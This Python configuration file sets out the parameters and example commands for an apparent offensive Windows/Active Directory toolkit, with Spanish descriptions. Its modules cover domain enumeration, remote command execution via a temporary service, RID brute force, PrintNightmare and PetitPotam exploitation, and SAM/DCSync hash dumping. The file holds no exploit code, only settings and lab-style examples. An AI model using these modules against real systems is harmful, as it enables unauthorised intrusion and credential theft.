# scripts/rpc/shell_params.py

EXPORT_FORMATS = ["json", "html", "xml", "yaml"]

SCRIPT_PARAMS = {
    # ── enum ──────────────────────────────────────────────────────────────────
    "domain-info": {
        "description": "Enumera información básica del dominio via SAMR/LSA (nombre, SID, DCs, política).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "timeout"],
        "defaults": {"timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "run",
        ],
    },
    "users": {
        "description": "Enumera usuarios del dominio via SAMR.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "timeout"],
        "defaults": {"timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "run",
        ],
    },
    "groups": {
        "description": "Enumera grupos del dominio via SAMR. Con local_admins muestra el grupo Administrators local.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "local_admins", "timeout"],
        "defaults": {"timeout": 5, "local_admins": False},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set local_admins true",
            "run",
        ],
    },
    "sessions": {
        "description": "Enumera sesiones activas en el objetivo via SRVSVC. Con open_files muestra ficheros abiertos.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "open_files", "timeout"],
        "defaults": {"timeout": 5, "open_files": False},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "run",
        ],
    },
    "privileges": {
        "description": "Enumera privilegios de cuentas via LSARPC. Detecta privilegios peligrosos (SeImpersonate, etc.).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "priv", "interesting_only", "timeout"],
        "defaults": {"timeout": 5, "interesting_only": False},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set interesting_only true",
            "run",
        ],
    },
    "services": {
        "description": "Enumera servicios de Windows via SCM. Filtra por estado o servicios interesantes.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "running_only", "interesting_only", "timeout"],
        "defaults": {"timeout": 5, "running_only": False, "interesting_only": False},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set running_only true",
            "run",
        ],
    },
    "registry": {
        "description": "Lee claves del registro remoto via WINREG. Especifica hive, key y value.",
        "required": ["target", "user", "key"],
        "optional": ["password", "hash", "domain", "hive", "value", "timeout"],
        "defaults": {"timeout": 5, "hive": "HKLM"},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set hive HKLM",
            "set key SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion",
            "set value ProductName",
            "run",
        ],
    },
    # ── attack ────────────────────────────────────────────────────────────────
    "exec-service": {
        "description": "Ejecuta un comando remoto creando un servicio temporal via SCM (requiere admin).",
        "required": ["target", "user", "command"],
        "optional": ["password", "hash", "domain", "svc_name", "wait", "timeout"],
        "defaults": {"timeout": 5, "svc_name": "LobSvc", "wait": 3},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set command whoami",
            "run",
        ],
    },
    "rid-brute": {
        "description": "Enumera usuarios por fuerza bruta de RID via SAMR (funciona con null session).",
        "required": ["target"],
        "optional": ["user", "password", "hash", "domain", "rid_start", "rid_end", "timeout"],
        "defaults": {"timeout": 5, "rid_start": 500, "rid_end": 10000},
        "mutually_exclusive": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set rid_start 500",
            "set rid_end 2000",
            "run",
        ],
    },
    # ── exploits ──────────────────────────────────────────────────────────────
    "printnightmare": {
        "description": "CVE-2021-1675/34527: comprueba si Spooler está activo y opcionalmente explota.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "action", "dll_path", "timeout"],
        "defaults": {"timeout": 5, "action": "check"},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set action check",
            "run",
        ],
    },
    "petitpotam": {
        "description": "CVE-2021-36942: fuerza autenticación NTLM del DC hacia un listener (NTLM relay).",
        "required": ["target", "user", "listener"],
        "optional": ["password", "hash", "domain", "action", "pipe", "timeout"],
        "defaults": {"timeout": 5, "action": "check", "pipe": "lsarpc"},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "set listener 10.10.14.5",
            "set action exploit",
            "run",
        ],
    },
    "sam-dump": {
        "description": "Extrae hashes SAM/LSA/DPAPI via DCSync o volcado remoto del registro (requiere DA).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "out_dir", "timeout"],
        "defaults": {"timeout": 5, "out_dir": "."},
        "mutually_exclusive": [["password", "hash"]],
        "at_least_one": [["password", "hash"]],
        "example": [
            "set target 10.10.10.5",
            "set user administrator",
            "set password Pass123!",
            "run",
        ],
    },
}

PARAM_LABELS = {
    "target":          "IP/hostname del objetivo",
    "user":            "Usuario",
    "password":        "Contraseña",
    "hash":            "Hash NT (formato NT o LM:NT)",
    "domain":          "Dominio FQDN",
    "timeout":         "Timeout de conexión (segundos)",
    "local_admins":    "Mostrar grupo Administrators local (True/False)",
    "open_files":      "Mostrar ficheros abiertos en sesiones (True/False)",
    "priv":            "Privilegio concreto a buscar (ej: SeImpersonatePrivilege)",
    "interesting_only":"Solo mostrar privilegios/servicios peligrosos (True/False)",
    "running_only":    "Solo servicios en ejecución (True/False)",
    "hive":            "Hive del registro (HKLM/HKCU/HKCR)",
    "key":             "Clave del registro a leer",
    "value":           "Valor concreto a leer (opcional)",
    "command":         "Comando a ejecutar remotamente",
    "svc_name":        "Nombre del servicio temporal (default: LobSvc)",
    "wait":            "Segundos a esperar tras ejecutar el servicio",
    "rid_start":       "RID inicial para fuerza bruta (default: 500)",
    "rid_end":         "RID final para fuerza bruta (default: 10000)",
    "action":          "Acción (check/exploit)",
    "dll_path":        "Ruta a la DLL maliciosa (para printnightmare exploit)",
    "listener":        "IP del listener para captura NTLM",
    "pipe":            "Named pipe a usar (lsarpc/efsrpc/samr/lsass/netlogon)",
    "out_dir":         "Directorio de salida para hashes volcados",
}
